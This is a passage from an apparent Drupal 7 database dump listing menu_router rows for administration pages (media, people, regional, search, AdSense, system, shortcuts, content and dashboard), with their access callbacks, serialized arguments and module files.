options.','',-20,'modules/system/system.admin.inc'),('admin/config/media','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/media','Media','t','','','a:0:{}',6,'Media tools.','left',-10,'modules/system/system.admin.inc'),('admin/config/media/file-system','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:27:\"system_file_system_settings\";}','',15,4,0,'','admin/config/media/file-system','File system','t','','','a:0:{}',6,'Tell Drupal where to store uploaded files and how they are accessed.','',-10,'modules/system/system.admin.inc'),('admin/config/media/image-styles','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','image_style_list','a:0:{}','',15,4,0,'','admin/config/media/image-styles','Image styles','t','','','a:0:{}',6,'Configure styles that can be used for resizing or adjusting images on display.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/add','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:1:{i:0;s:20:\"image_style_add_form\";}','',31,5,1,'admin/config/media/image-styles','admin/config/media/image-styles','Add style','t','','','a:0:{}',388,'Add a new image style.','',2,'modules/image/image.admin.inc'),('admin/config/media/image-styles/delete/%','a:1:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;N;i:1;s:1:\"1\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:23:\"image_style_delete_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/delete/%','Delete style','t','','','a:0:{}',6,'Delete an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%','a:1:{i:5;s:16:\"image_style_load\";}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:16:\"image_style_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/edit/%','Edit style','t','','','a:0:{}',6,'Configure an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/add/%','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:1:{i:0;i:5;}}i:7;a:1:{s:28:\"image_effect_definition_load\";a:1:{i:0;i:5;}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:17:\"image_effect_form\";i:1;i:5;i:2;i:7;}','',250,8,0,'','admin/config/media/image-styles/edit/%/add/%','Add image effect','t','','','a:0:{}',6,'Add a new effect to a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/effects/%','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}i:7;a:1:{s:17:\"image_effect_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:17:\"image_effect_form\";i:1;i:5;i:2;i:7;}','',250,8,0,'','admin/config/media/image-styles/edit/%/effects/%','Edit image effect','t','','','a:0:{}',6,'Edit an existing effect within a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/effects/%/delete','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}i:7;a:1:{s:17:\"image_effect_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:24:\"image_effect_delete_form\";i:1;i:5;i:2;i:7;}','',501,9,0,'','admin/config/media/image-styles/edit/%/effects/%/delete','Delete image effect','t','','','a:0:{}',6,'Delete an existing effect from a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/list','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','image_style_list','a:0:{}','',31,5,1,'admin/config/media/image-styles','admin/config/media/image-styles','List','t','','','a:0:{}',140,'List the current image styles on the site.','',1,'modules/image/image.admin.inc'),('admin/config/media/image-styles/revert/%','a:1:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;N;i:1;s:1:\"2\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:23:\"image_style_revert_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/revert/%','Revert style','t','','','a:0:{}',6,'Revert an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-toolkit','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:29:\"system_image_toolkit_settings\";}','',15,4,0,'','admin/config/media/image-toolkit','Image toolkit','t','','','a:0:{}',6,'Choose which image toolkit to use if you have installed optional toolkits.','',20,'modules/system/system.admin.inc'),('admin/config/people','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/people','People','t','','','a:0:{}',6,'Configure user accounts.','left',-20,'modules/system/system.admin.inc'),('admin/config/people/accounts','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:1:{i:0;s:19:\"user_admin_settings\";}','',15,4,0,'','admin/config/people/accounts','Account settings','t','','','a:0:{}',6,'Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.','',-10,'modules/user/user.admin.inc'),('admin/config/people/accounts/display','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/display/default','','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}','',63,6,1,'admin/config/people/accounts/display','admin/config/people/accounts','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/display/full','','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:4:\"full\";}','',63,6,1,'admin/config/people/accounts/display','admin/config/people/accounts','User account','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',62,6,0,'','admin/config/people/accounts/fields/%','','field_ui_menu_title','a:1:{i:0;i:5;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/delete','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/edit','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/field-settings','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/widget-type','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/settings','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:1:{i:0;s:19:\"user_admin_settings\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Settings','t','','','a:0:{}',140,'','',-10,'modules/user/user.admin.inc'),('admin/config/people/ip-blocking','','','user_access','a:1:{i:0;s:18:\"block IP addresses\";}','system_ip_blocking','a:0:{}','',15,4,0,'','admin/config/people/ip-blocking','IP address blocking','t','','','a:0:{}',6,'Manage blocked IP addresses.','',10,'modules/system/system.admin.inc'),('admin/config/people/ip-blocking/delete/%','a:1:{i:5;s:15:\"blocked_ip_load\";}','','user_access','a:1:{i:0;s:18:\"block IP addresses\";}','drupal_get_form','a:2:{i:0;s:25:\"system_ip_blocking_delete\";i:1;i:5;}','',62,6,0,'','admin/config/people/ip-blocking/delete/%','Delete IP address','t','','','a:0:{}',6,'','',0,'modules/system/system.admin.inc'),('admin/config/regional','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/regional','Regional and language','t','','','a:0:{}',6,'Regional settings, localization and translation.','left',-5,'modules/system/system.admin.inc'),('admin/config/regional/date-time','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_date_time_settings\";}','',15,4,0,'','admin/config/regional/date-time','Date and time','t','','','a:0:{}',6,'Configure display formats for date and time.','',-15,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_date_time_formats','a:0:{}','',31,5,1,'admin/config/regional/date-time','admin/config/regional/date-time','Formats','t','','','a:0:{}',132,'Configure display format strings for date and time.','',-9,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/%/delete','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:30:\"system_date_delete_format_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/formats/%/delete','Delete date format','t','','','a:0:{}',6,'Allow users to delete a configured date format.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/%/edit','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:34:\"system_configure_date_formats_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/formats/%/edit','Edit date format','t','','','a:0:{}',6,'Allow users to edit a configured date format.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/add','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:34:\"system_configure_date_formats_form\";}','',63,6,1,'admin/config/regional/date-time/formats','admin/config/regional/date-time','Add format','t','','','a:0:{}',388,'Allow users to add additional date formats.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/lookup','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_date_time_lookup','a:0:{}','',63,6,0,'','admin/config/regional/date-time/formats/lookup','Date and time lookup','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_date_time_settings\";}','',31,5,1,'admin/config/regional/date-time','admin/config/regional/date-time','Types','t','','','a:0:{}',140,'Configure display formats for date and time.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types/%/delete','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:35:\"system_delete_date_format_type_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/types/%/delete','Delete date type','t','','','a:0:{}',6,'Allow users to delete a configured date type.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types/add','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:32:\"system_add_date_format_type_form\";}','',63,6,1,'admin/config/regional/date-time/types','admin/config/regional/date-time','Add date type','t','','','a:0:{}',388,'Add new date type.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/settings','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:24:\"system_regional_settings\";}','',15,4,0,'','admin/config/regional/settings','Regional settings','t','','','a:0:{}',6,'Settings for the site\'s default time zone and country.','',-20,'modules/system/system.admin.inc'),('admin/config/search','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/search','Search and metadata','t','','','a:0:{}',6,'Local site search, metadata and SEO.','left',-10,'modules/system/system.admin.inc'),('admin/config/search/clean-urls','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_clean_url_settings\";}','',15,4,0,'','admin/config/search/clean-urls','Clean URLs','t','','','a:0:{}',6,'Enable or disable clean URLs for your site.','',5,'modules/system/system.admin.inc'),('admin/config/search/clean-urls/check','','','1','a:0:{}','drupal_json_output','a:1:{i:0;a:1:{s:6:\"status\";b:1;}}','',31,5,0,'','admin/config/search/clean-urls/check','Clean URL check','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/search/path','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_overview','a:0:{}','',15,4,0,'','admin/config/search/path','URL aliases','t','','','a:0:{}',6,'Change your site\'s URL paths by aliasing them.','',-5,'modules/path/path.admin.inc'),('admin/config/search/path/add','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_edit','a:0:{}','',31,5,1,'admin/config/search/path','admin/config/search/path','Add alias','t','','','a:0:{}',388,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/delete/%','a:1:{i:5;s:9:\"path_load\";}','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','drupal_get_form','a:2:{i:0;s:25:\"path_admin_delete_confirm\";i:1;i:5;}','',62,6,0,'','admin/config/search/path/delete/%','Delete alias','t','','','a:0:{}',6,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/edit/%','a:1:{i:5;s:9:\"path_load\";}','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_edit','a:1:{i:0;i:5;}','',62,6,0,'','admin/config/search/path/edit/%','Edit alias','t','','','a:0:{}',6,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/list','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_overview','a:0:{}','',31,5,1,'admin/config/search/path','admin/config/search/path','List','t','','','a:0:{}',140,'','',-10,'modules/path/path.admin.inc'),('admin/config/search/settings','','','user_access','a:1:{i:0;s:17:\"administer search\";}','drupal_get_form','a:1:{i:0;s:21:\"search_admin_settings\";}','',15,4,0,'','admin/config/search/settings','Search settings','t','','','a:0:{}',6,'Configure relevance settings for search and other indexing options.','',-10,'modules/search/search.admin.inc'),('admin/config/search/settings/reindex','','','user_access','a:1:{i:0;s:17:\"administer search\";}','drupal_get_form','a:1:{i:0;s:22:\"search_reindex_confirm\";}','',31,5,0,'','admin/config/search/settings/reindex','Clear index','t','','','a:0:{}',4,'','',0,'modules/search/search.admin.inc'),('admin/config/services','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/services','Web services','t','','','a:0:{}',6,'Tools related to web services.','right',0,'modules/system/system.admin.inc'),('admin/config/services/adsense','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:21:\"adsense_main_settings\";}','',15,4,0,'','admin/config/services/adsense','AdSense','t','','','a:0:{}',6,'Configure Google AdSense Ads.','',0,'sites/all/modules/adsense/adsense.admin.inc'),('admin/config/services/adsense/click','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:28:\"adsense_click_admin_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Clicks','t','','','a:0:{}',132,'Track the clicks on Adsense ads.','',9,'sites/all/modules/adsense/contrib/adsense_click/adsense_click.admin.inc'),('admin/config/services/adsense/cse','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:20:\"adsense_cse_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Custom Search','t','','','a:0:{}',132,'','',2,'sites/all/modules/adsense/cse/adsense_cse.admin.inc'),('admin/config/services/adsense/main','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:21:\"adsense_main_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Settings','t','','','a:0:{}',140,'','',10,'sites/all/modules/adsense/adsense.admin.inc'),('admin/config/services/adsense/managed','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:24:\"adsense_managed_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Managed Ads','t','','','a:0:{}',132,'','',1,'sites/all/modules/adsense/managed/adsense_managed.admin.inc'),('admin/config/services/adsense/oldcode','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:24:\"adsense_oldcode_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Old Code Ads','t','','','a:0:{}',132,'','',3,'sites/all/modules/adsense/old/oldcode/adsense_oldcode.admin.inc'),('admin/config/services/adsense/publisher','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:19:\"adsense_id_settings\";}','',31,5,1,'admin/config/services/adsense','admin/config/services/adsense','Publisher ID','t','','','a:0:{}',132,'','',0,'sites/all/modules/adsense/adsense.admin.inc'),('admin/config/services/adsense/publisher/site','','','user_access','a:1:{i:0;s:18:\"administer adsense\";}','drupal_get_form','a:1:{i:0;s:19:\"adsense_id_settings\";}','',63,6,1,'admin/config/services/adsense/publisher','admin/config/services/adsense','Site ID','t','','','a:0:{}',140,'','',-1,'sites/all/modules/adsense/adsense.admin.inc'),('admin/config/services/rss-publishing','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_rss_feeds_settings\";}','',15,4,0,'','admin/config/services/rss-publishing','RSS publishing','t','','','a:0:{}',6,'Configure the site description, the number of items per feed and whether feeds should be titles/teasers/full-text.','',0,'modules/system/system.admin.inc'),('admin/config/system','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/system','System','t','','','a:0:{}',6,'General system related configuration.','right',-20,'modules/system/system.admin.inc'),('admin/config/system/actions','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_manage','a:0:{}','',15,4,0,'','admin/config/system/actions','Actions','t','','','a:0:{}',6,'Manage the actions defined for your site.','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/configure','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','drupal_get_form','a:1:{i:0;s:24:\"system_actions_configure\";}','',31,5,0,'','admin/config/system/actions/configure','Configure an advanced action','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/delete/%','a:1:{i:5;s:12:\"actions_load\";}','','user_access','a:1:{i:0;s:18:\"administer actions\";}','drupal_get_form','a:2:{i:0;s:26:\"system_actions_delete_form\";i:1;i:5;}','',62,6,0,'','admin/config/system/actions/delete/%','Delete action','t','','','a:0:{}',6,'Delete an action.','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/manage','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_manage','a:0:{}','',31,5,1,'admin/config/system/actions','admin/config/system/actions','Manage actions','t','','','a:0:{}',140,'Manage the actions defined for your site.','',-2,'modules/system/system.admin.inc'),('admin/config/system/actions/orphan','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_remove_orphans','a:0:{}','',31,5,0,'','admin/config/system/actions/orphan','Remove orphans','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/system/cron','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:20:\"system_cron_settings\";}','',15,4,0,'','admin/config/system/cron','Cron','t','','','a:0:{}',6,'Manage automatic site maintenance tasks.','',20,'modules/system/system.admin.inc'),('admin/config/system/site-information','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:32:\"system_site_information_settings\";}','',15,4,0,'','admin/config/system/site-information','Site information','t','','','a:0:{}',6,'Change site name, e-mail address, slogan, default front page, and number of posts per page, error pages.','',-20,'modules/system/system.admin.inc'),('admin/config/system/statistics','','','user_access','a:1:{i:0;s:21:\"administer statistics\";}','drupal_get_form','a:1:{i:0;s:24:\"statistics_settings_form\";}','',15,4,0,'','admin/config/system/statistics','Statistics','t','','','a:0:{}',6,'Control details about what and how your site logs access statistics.','',-15,'modules/statistics/statistics.admin.inc'),('admin/config/user-interface','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/user-interface','User interface','t','','','a:0:{}',6,'Tools that enhance the user interface.','right',-15,'modules/system/system.admin.inc'),('admin/config/user-interface/shortcut','','','user_access','a:1:{i:0;s:20:\"administer shortcuts\";}','shortcut_set_admin','a:0:{}','',15,4,0,'','admin/config/user-interface/shortcut','Shortcuts','t','','','a:0:{}',6,'Add and modify shortcut sets.','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}','',30,5,0,'','admin/config/user-interface/shortcut/%','Edit shortcuts','shortcut_set_title_callback','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/add-link','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:17:\"shortcut_link_add\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Add shortcut','t','','','a:0:{}',388,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/add-link-inline','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','shortcut_link_add_inline','a:1:{i:0;i:4;}','',61,6,0,'','admin/config/user-interface/shortcut/%/add-link-inline','Add shortcut','t','','','a:0:{}',0,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/delete','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_delete_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:24:\"shortcut_set_delete_form\";i:1;i:4;}','',61,6,0,'','admin/config/user-interface/shortcut/%/delete','Delete shortcut set','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/edit','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_edit_form\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Edit set name','t','','','a:0:{}',132,'','',10,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/links','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','List links','t','','','a:0:{}',140,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/add-set','','','user_access','a:1:{i:0;s:20:\"administer shortcuts\";}','drupal_get_form','a:1:{i:0;s:21:\"shortcut_set_add_form\";}','',31,5,1,'admin/config/user-interface/shortcut','admin/config/user-interface/shortcut','Add shortcut set','t','','','a:0:{}',388,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/link/%','a:1:{i:5;s:14:\"menu_link_load\";}','','shortcut_link_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:18:\"shortcut_link_edit\";i:1;i:5;}','',62,6,0,'','admin/config/user-interface/shortcut/link/%','Edit shortcut','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/link/%/delete','a:1:{i:5;s:14:\"menu_link_load\";}','','shortcut_link_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:20:\"shortcut_link_delete\";i:1;i:5;}','',125,7,0,'','admin/config/user-interface/shortcut/link/%/delete','Delete shortcut','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/workflow','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/workflow','Workflow','t','','','a:0:{}',6,'Content workflow, editorial workflow tools.','right',5,'modules/system/system.admin.inc'),('admin/content','','','user_access','a:1:{i:0;s:23:\"access content overview\";}','drupal_get_form','a:1:{i:0;s:18:\"node_admin_content\";}','',3,2,0,'','admin/content','Content','t','','','a:0:{}',6,'Administer content and comments.','',-10,'modules/node/node.admin.inc'),('admin/content/comment','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:0:{}','',7,3,1,'admin/content','admin/content','Comments','t','','','a:0:{}',134,'List and edit site comments and the comment approval queue.','',0,'modules/comment/comment.admin.inc'),('admin/content/comment/approval','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:1:{i:0;s:8:\"approval\";}','',15,4,1,'admin/content/comment','admin/content','Unapproved comments','comment_count_unpublished','','','a:0:{}',132,'','',0,'modules/comment/comment.admin.inc'),('admin/content/comment/new','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:0:{}','',15,4,1,'admin/content/comment','admin/content','Published comments','t','','','a:0:{}',140,'','',-10,'modules/comment/comment.admin.inc'),('admin/content/node','','','user_access','a:1:{i:0;s:23:\"access content overview\";}','drupal_get_form','a:1:{i:0;s:18:\"node_admin_content\";}','',7,3,1,'admin/content','admin/content','Content','t','','','a:0:{}',140,'','',-10,'modules/node/node.admin.inc'),('admin/dashboard','','','user_access','a:1:{i:0;s:16:\"access dashboard\";}','dashboard_admin','a:0:{}','',3,2,0,'','admin/dashboard','Dashboard','t','','','a:0:{}',6,'View and customize your dashboard.','',-15,''),('admin/dashboard/block-content/%/%','a:2:{i:3;N;i:4;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_show_block_content','a:2:{i:0;i:3;i:1;i:4;}','',28,5,0,'','admin/dashboard/block-content/%/%','','t','','','a:0:{}',0,'','',0,''),('admin/dashboard/configure','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_admin_blocks','a:0:{}','',7,3,0,'','admin/dashboard/configure','Configure available dashboard blocks','t','','','a:0:{}',4,'Configure which blocks can be shown on the dashboard.','',0,''),('admin/dashboard/customize','','','user_access','a:1:{i:0;s:16:\"access dashboard\";}','dashboard_admin','a:1:{i:0;b:1;}','',7,3,0,'','admin/dashboard/customize','Customize dashboard','t','','','a:0:{}',4,'Customize your dashboard.','',0,''),('admin/dashboard/drawer','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_show_disabled','a:0:{}','',7,3,0,'','admin/dashboard/drawer','','t','','','a:0:{}',0,'','',0,''),('admin/dashboard/update','','','user_access','a:1:{i:0;s:17:\"administer 